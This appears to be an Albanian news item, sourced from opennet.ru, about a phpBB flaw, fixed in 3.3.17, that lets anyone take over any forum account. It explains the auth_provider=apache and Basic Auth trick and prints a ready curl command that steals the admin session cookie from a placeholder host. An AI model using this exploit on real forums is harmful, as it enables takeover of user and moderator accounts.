Vulnerabilitet në phpBB, i cili lejon akses në çdo llogari pa autentifikim

Në motorin e lirë për krijimin e forumeve phpBB është zbuluar një dobësi që lejon, përmes dërgimit të një kërkese HTTP, të lidhet me seancën e çdo përdoruesi të forumit. Dobësia shfaqet në konfigurimin e phpBB-së siç është paracaktuar. Problemi është zgjidhur në versionin phpBB 3.3.17.

Gjatë një sulmi ndaj përdoruesve të zakonshëm, mund të arrihet qasje në bisedat private dhe mundësinë për të dërguar mesazhe në emër të përdoruesit. Gjatë një sulmi ndaj moderatorëve dhe administratorëve, është e mundur të fshihen mesazhet e të tjerëve, të shikohen adresat IP dhe email-et, të lexohen bisedat private, por nuk mund të hyhet në ndërfaqen e administratorit dhe të arrihet qasje në host.

Detajet mbi dobësinë nuk jepen, por me ndihmën e AI bazuar në rregullimin, tashmë është riprodhuar metoda e shfrytëzimit, e bazuar në thirrjen e përpunuesit 'login_link' me vendosjen e metodës së autentifikimit 'auth_provider=apache' dhe zëvendësimin e emrit të përdoruesit përmes Basic Auth, pas së cilës PHP do të vendosë variablën e mjedisit 'PHP_AUTH_USER=emri_i_përdoruesit', dhe phpBB do ta nxjerrë nga ajo emrin e përdoruesit pa verifikimin e fjalëkalimit. Për shembull, për të marrë identifikuesin e sesionit të përdoruesit admin dhe ta ruaj atë në skedarin cookies.txt, mund të ekzekutohet kodi:

curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u ‘admin:anything’ \
-d ‘login=Login&login_username=admin&login_password=anything’ \
‘https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1’

Burimi: opennet.ru

Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« đŸ”„ Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« | ProHoster